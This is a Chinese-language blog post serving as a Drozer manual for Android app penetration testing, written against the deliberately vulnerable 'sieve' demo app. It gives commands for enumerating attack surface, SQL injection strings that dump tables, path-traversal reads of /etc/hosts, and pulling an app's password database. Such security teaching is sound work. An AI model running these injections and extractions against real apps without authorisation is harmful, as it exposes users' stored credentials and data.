`
MyEyeOfJava
  • 浏览: 1152027 次
  • 性别: Icon_minigender_1
  • 来自: 北京
博客专栏
7af2d6ca-4fe1-3e9a-be85-3f65f7120bd0
测试开发
浏览量:71172
533896eb-dd7b-3cde-b4d3-cc1ce02c1c14
晨记
浏览量:0
社区版块
存档分类
最新评论

Drozer使用手册

阅读更多

Drozer ⼯具的安装与启动:源码地址(https://github.com/mwrlabs/drozer/)
1. 安装
(1) 下载 https://www.mwrinfosecurity.com/products/drozer/community-edition/
Mac下可以下载python版
(2) PC上安装drozer:
sudo easy_install --allow-hosts pypi.python.org protobuf==2.4.1
easy_install twisted==10.2.0 (为了⽀持Infrastructure模式)
sudo easy_install ./drozer-2.3.4-py2.7.egg
(3) 在Android设备上安装agent.apk
adb install agent.apk
2. 启动
(1) PC上使⽤adb进⾏端⼝转发,转发到Drozer使⽤的端⼝31415
adb forward tcp:31415 tcp:31415
(2) 在Android设备上开启Drozer Agent,选择embedded server-enabled
(3) 在PC上开启Drozer Console
drozer console connect

 

一、 Android组件安全测试

1.获取包名
dz> run app.package.list -f sieve

com.mwr.example.sieve

2.获取应用的基本信息

run app.package.info -a com.mwr.example.sieve

3.确定攻击面

run app.package.attacksurface com.mwr.example.sieve

4.Activity

(1)获取activity信息

run app.activity.info -a com.mwr.example.sieve

(2)启动activity

run app.activity.start --component com.mwr.example.sieve

dz> help app.activity.start

usage: run app.activity.start -h --action ACTION --category CATEGORY

--component PACKAGE COMPONENT --data-uri DATA_URI

--extra TYPE KEY VALUE [--flags FLAGS FLAGS ...]

--mimetype MIMETYPE

5.Content Provider

(1)获取Content Provider信息

run app.provider.info -a com.mwr.example.sieve

(2)Content Providers(数据泄露)

先获取所有可以访问的Uri:

run scanner.provider.finduris -a com.mwr.example.sieve

获取各个Uri的数据:

run app.provider.query

content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
查询到数据说明存在漏洞

(3)Content Providers(SQL注入)

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

报错则说明存在SQL注入。

列出所有表:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ -projection "* FROM SQLITE_MASTER WHERE type='table';-"

获取某个表(如Key)中的数据:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ -projection "* FROM Key;-"

(4)同时检测SQL注入和目录遍历

run scanner.provider.injection -a com.mwr.example.sieve

run scanner.provider.traversal -a com.mwr.example.sieve

6.Service

(1)获取service详情

run app.service.info -a com.mwr.example.sieve

不使用drozer启动service

am startservice --n 包名/service名

7.Broadcast Receiver

app.broadcast.info 获取broadcast receivers信息

app.broadcast.send 通过intent发送broadcast receiver

 

 

全部命令:

list  //列出目前可用的模块,也可以使用ls
> help app.activity.forintent       //查看指定模块的帮助信息
> run app.package.list      //列出android设备中安装的app
> run app.package.info -a com.android.browser       //查看指定app的基本信息
> run app.activity.info -a com.android.browser      //列出app中的activity组件
> run app.activity.start --action android.intent.action.VIEW --data-uri  http://www.google.com  //开启一个activity,例如运行浏览器打开谷歌页面
> run scanner.provider.finduris -a com.sina.weibo       //查找可以读取的Content Provider
> run  app.provider.query content://settings/secure --selection "name='adb_enabled'"    //读取指定Content Provider内容
> run scanner.misc.writablefiles --privileged /data/data/com.sina.weibo     //列出指定文件路径里全局可写/可读的文件
> run shell.start       //shell操作
> run tools.setup.busybox       //安装busybox
> list auxiliary        //通过web的方式查看content provider组件的相关内容
> help auxiliary.webcontentresolver     //webcontentresolver帮助
> run auxiliary.webcontentresolver      //执行在浏览器中以http://localhost:8080即可访问
以sieve示例
> run app.package.list -f sieve         //查找sieve应用程序
> run app.package.info -a com.mwr.example.sieve         //显示app.package.info命令包的基本信息
> run app.package.attacksurface com.mwr.example.sieve   //确定攻击面
> run app.activity.info -a com.mwr.example.sieve         //获取activity信息
> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList     //启动pwlist
> run app.provider.info -a com.mwr.example.sieve        //提供商信息
> run scanner.provider.finduris -a com.mwr.example.sieve        //扫描所有能访问地址 
>run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/--vertical  //查看DBContentProvider/Passwords这条可执行地址
> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"   //检测注入
> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts    //查看读权限数据
> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db //下载数据
> run scanner.provider.injection -a com.mwr.example.sieve       //扫描注入地址
> run scanner.provider.traversal -a com.mwr.example.sieve
> run app.service.info -a com.mwr.example.sieve         //查看服务
分享到:
评论

相关推荐

    Drozer使用手册(APP安全测试)

    此外,"移动应用程序黑客手册"也是一份有价值的资源,其中详细介绍了 Android 安全概念和 drozer 的使用方法。 要开始使用 drozer,你需要准备一台运行 Windows、Linux 或 Mac OS X 的电脑,以及至少运行 Android ...

    drozer用户手册-drozer Users' Guide-2.3.4

    【drozer用户手册-drozer Users' Guide-2.3.4】-英文 drozer是一款针对Android系统的安全测试框架。Drozer可以通过与Dalivik VM,其它应用程序的IPC端点以及底层操作系统的交互,避免正处于开发阶段,或者部署于你的...

    drozer简介及使用

    ### Drozer简介及使用 #### 一、Drozer简介 Drozer是一款专为Android系统设计的安全测试框架。该工具允许用户通过与Dalvik VM、其他应用程序的IPC(Inter-Process Communication)端点以及底层操作系统进行交互,...

    android安全框架工具drozer使用指南

    2. 在CMD中,使用`adb devices`检查设备连接,`adb forward tcp:31415 tcp:31415`设置端口转发,然后`drozer.bat console connect`连接到手机。 3. 开始测试: - `run app.package.list –f shinow`查找APP全称。 ...

    Drozer使用说明详解与示范APK

    《Drozer使用说明详解与示范APK》 在Android应用开发和安全研究领域,Drozer是一款由MWR InfoSecurity公司开发的强大工具,它专为深入分析和测试Android应用程序的安全性而设计。通过这款工具,专业人士能够有效地...

    Drozer使用指南

    **Drozer 使用指南** Drozer 是一款强大的Android安全评估工具,由MWR InfoSecurity开发,用于检测和利用Android应用程序、系统服务以及设备上的安全漏洞。它通过提供一套全面的API,使得安全研究人员和渗透测试...

    drozer资料.zip

    在这个博客中,作者可能详细阐述了drozer的使用方法、功能、应用场景以及如何通过drozer进行Android应用的安全测试和漏洞挖掘。 **标签解析:** 1. **drozer** - drozer是一款强大的Android安全评估框架,它允许...

    Drozer 使用指南(中文版).pdf

    Drozer的使用指南详细介绍了如何安装和使用这个工具,包括了对Drozer概念的讲解、如何安装以及在不同操作系统环境下的配置方法。尽管文档中有些内容是通过OCR扫描得到的,可能包含技术原因导致的个别字识别错误或漏...

    Drozer 使用指南英文版.rar

    Drozer 使用指南英文版 Drozer 有助于提供信心,即由您的组织开发或部署的 Android 应用程序和设备不会带来不可接受的风险。通过允许您与 DalvikVM、其他应用程序的 IPC 端点和底层操作系统进行交互 Drozer 提供了...

    drozer相关的sieve,drozer-2.4.4.win32,drozer-agent-2.3.4

    drozer资料可能包含了上述组件的详细使用指南、示例脚本、常见问题解答以及安全测试的最佳实践。通过深入学习和实践,安全研究人员可以更好地利用drozer来发现和修复Android系统的安全漏洞,提升应用程序的安全性。

    drozer-2.3.4-1.noarch.rpm

    drozer提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程漏洞,drozer能够生产shellcode帮助你部署drozer代理作为一个远程管理工具,最大化对设备的利用。 更快的Android安全评估 drozer可以大大...

    Drozer中文乱码解决办法.docx

    Drozer 是一款功能强大的 Android 渗透测试工具,但是在使用时,可能会遇到中文乱码的问题。今天,我们将探讨 Drozer 中文乱码解决办法。 一、问题描述 在使用 Drozer 时,可能会遇到中文乱码的问题。例如,在...

    drozer最新2.4.4版本

    在使用drozer进行渗透测试时,通常需要先安装drozer代理到目标设备,然后通过命令行界面(CLI)或其提供的Python API发送指令。开发者提供的"drozer-develop"文件可能包含了源码、文档、示例脚本和其他开发资源,...

    drozer (Python .egg)- drozer-2.3.4.tar.gz

    drozer提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程漏洞,drozer能够生产shellcode帮助你部署drozer代理作为一个远程管理工具,最大化对设备的利用。 更快的Android安全评估 drozer可以大大...

    drozer 2.3.4 (Windows Installer)

    drozer提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程漏洞,drozer能够生产shellcode帮助你部署drozer代理作为一个远程管理工具,最大化对设备的利用。 更快的Android安全评估 drozer可以大大...

    drozer安全测评软件

    无论是开发者还是安全研究人员,都可以通过学习和使用Drozer来提升对Android应用安全的理解和防护能力。通过深入分析权限、组件、服务和动态行为,Drozer可以帮助我们构建更安全的应用环境,抵御日益复杂的移动安全...

    drozer-工具Android渗透工具.zip

    为了检测潜在的漏洞和安全风险,开发者和安全专家常常使用专业工具,如drozer。drozer是一款强大的开源Android渗透测试框架,它允许安全研究人员通过API滥用、权限提升和信息泄漏等多种方式来发现和利用Android系统...

    drozer (for windows)

    在Windows环境下使用Drozer,你可以享受到跨平台的优势,无需在Linux或Mac上进行复杂的环境配置。这使得Windows用户也能方便地参与到Android应用的安全测试中。 **核心功能** 1. **代码审计**:Drozer提供了模块化...

    安卓工具drozer安装和使用(anaconda).docx

    安卓工具drozer安装和使用(anaconda) 在这篇文章中,我们将讲解如何安装和使用安卓渗透测试工具Drozer,包括环境准备、安装Drozer、配置Python环境、创建连接和测试模拟器安装的软件包。 环境准备是 Drozer 安装...

Global site tag (gtag.js) - Google Analytics